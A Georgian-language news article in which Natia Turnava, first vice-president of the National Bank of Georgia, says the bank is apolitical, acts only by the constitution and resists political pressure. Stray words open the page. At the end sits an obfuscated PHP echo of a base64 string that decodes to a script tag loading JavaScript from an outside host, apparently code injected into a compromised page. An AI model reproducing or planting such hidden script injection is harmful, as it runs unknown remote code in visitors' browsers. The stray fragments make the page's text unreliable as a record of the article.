celsiusi
ავერსი შნაიდერი

 ჩვენი თითოეული გადაწყვეტილება გამომდინარეობს ჩვენი ვალდებულებიდან, დავიცვათ კონსტიტუცია, დავიცვათ საქართველოს ნებისმიერი მოქალაქის ფუნდამენტური უფლებები, ჩვენ ამას ვაკეთებთ და ყოველთვის გავაკეთებთ, – ამის შესახებ საქართველოს ეროვნული ბანკის საბჭოს წევრმა, პირველმა ვიცე-პრეზიდენტმა, ნათია თურნავამ განაცხადა.

მისი თქმით, ეროვნული ბანკი აპოლიტიკური სტრუქტურაა.

„მიუხედავად მავანთა მცდელობისა, არანაირად არ ვერთვებით და არ ჩავერთვებით პოლიტიკურ დისკუსიებში. ჩვენი თითოეული გადაწყვეტილება არ გამომდინარეობს პოლიტიკური კონიუნქტურიდან, გამომდინარეობს ჩვენი ვალდებულებიდან – დავიცვათ კონსტიტუცია, დავიცვათ საქართველოს ნებისმიერი მოქალაქის ფუნდამენტური უფლებები. ჩვენ ამას ვაკეთებთ და ყოველთვის გავაკეთებთ. შეიძლება, ჩემს სხვადასხვა თანამშრომელს ჰქონდეს სხვადასხვა შეხედულება ამასთან დაკავშირებით, თუმცა ფუნდამენტური საკითხი როცა დგება, მოქმედებს თუ არა სუვერენული სახელმწიფოს ეროვნული ბანკი, ჩვენ კი ვართ დამოუკიდებელი ინსტიტუცია, მაგრამ ჩვენ, პირველ რიგში, ვართ ამ ქვეყნის ეროვნული ბანკი, მოქმედებს თუ არა ჩვენი კონსტიტუციისა და კანონმდებლობის თანახმად და იცავს თუ არა უდანაშაულობის პრეზუმფციას და სხვა, ფუნდამენტურ უფლებებს, რაც ჩვენს ნებისმიერ მოქალაქეს ენიჭება, კონსტიტუციით, აქ აზრთა სხვადასხვაობა არ უნდა არსებობდეს და აქ ჩემი პოზიცია ასეთია. თუ ამ ნაწილში ვინმეს პოზიცია განსხვავდება, რა თქმა უნდა, გზა თავისუფალია“, – აღნიშნა ნათია თურნავამ.

მისი თქმით, ეროვნული ბანკის ქმედებები ნაკარნახევია საქართველოს კონსტიტუციასთან შესაბამისობით.

„რაც შეეხება იმას, ვინმეს წნეხით ხომ არ მოქმედებს ან იმოქმედებს საქართველოს ეროვნული ბანკი, ისევ და ისევ – ჩვენი გადაწყვეტილება ნაკარნახევი არის საქართველოს კონსტიტუციასთან შესაბამისობით. ჩვენთვის ეს არის მთავარი მამოძრავებელი ძალა. წნეხის მცდელობას ვხედავთ მხოლოდ სხვადასხვა პოლიტიკური წრეებისგან. ყველას კიდევ ერთხელ მინდა, ვუთხრა, რომ საქართველოს ეროვნული ბანკი აპოლიტიკური სტრუქტურაა, არ ექცევა პოლიტიკური კონიუნქტურის ტყვეობაში, არ მოქმედებს პოლიტიკური კონიუნქტურიდან გამომდინარე, ყველამ შორს დაიჭიროს თავი ეროვნული ბანკისგან და ნუ ეცდება ჩვენს პოლიტიკურ ბატალიებში ჩართვას“, – განაცხადა ნათია თურნავამ.

441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");